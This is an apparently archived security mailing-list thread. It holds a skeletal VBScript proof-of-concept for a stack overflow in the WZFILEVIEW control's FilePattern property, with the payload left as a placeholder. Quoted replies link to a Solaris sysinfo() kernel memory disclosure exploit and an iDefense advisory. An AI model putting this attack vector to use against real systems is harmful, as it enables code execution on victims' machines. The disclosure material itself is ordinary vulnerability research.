7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
below;
HTML
HEAD
TITLE/TITLE
/HEAD
BODY
SCRIPT LANGUAGE=VBScript
!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = SMASHTHESTACKHERE
end sub
--
/SCRIPT
OBJECT
Exploit has been attached as problems with site
hosting over weekend.
--- Micheal Turner [EMAIL PROTECTED] wrote:
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
--- labs-no-reply [EMAIL PROTECTED]
wrote:
Sun Microsystems Solaris sysinfo() Kernel Memory
Disclosure
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
--- labs-no-reply [EMAIL PROTECTED] wrote:
Sun Microsystems Solaris sysinfo() Kernel Memory
Disclosure Vulnerability
iDefense Security Advisory 07.20.06
http://www.idefense.com/application/poi/display?type=vulnerabilities